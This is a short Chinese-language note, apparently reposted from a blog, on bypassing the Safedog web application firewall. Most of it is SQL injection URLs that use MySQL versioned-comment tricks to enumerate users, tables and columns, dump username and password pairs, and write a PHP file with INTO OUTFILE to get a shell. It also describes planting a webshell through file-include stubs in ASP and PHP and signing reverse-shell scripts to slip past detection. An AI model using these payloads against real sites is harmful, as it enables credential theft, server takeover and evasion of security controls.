借助burp
看回显获取用户
url.php?id=-1‘/*!50000union/*!(select*/1,2,3);
url.php?id=-1‘/*!50000union/*!(select*/~1,2,3);
url.php?id=-1‘/*!50000union/*!50000/*!(select*/~1,2,3)
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
获取表名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))
获取列名
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)
获取数据
http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)
Getshell
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)
burp功能
php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)
将大马写到txt文件中,命名为dama.txt,再新建一个文本
asp的写入<!-#include file="dama.txt"-> 保存,两文件放到同目录下,反问url/x.asp,然后访问即可
php的写入<?php require_once(dama.txt);?>
有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。
后面在继续更新。。。
原文:https://www.cnblogs.com/forforever/p/13773995.html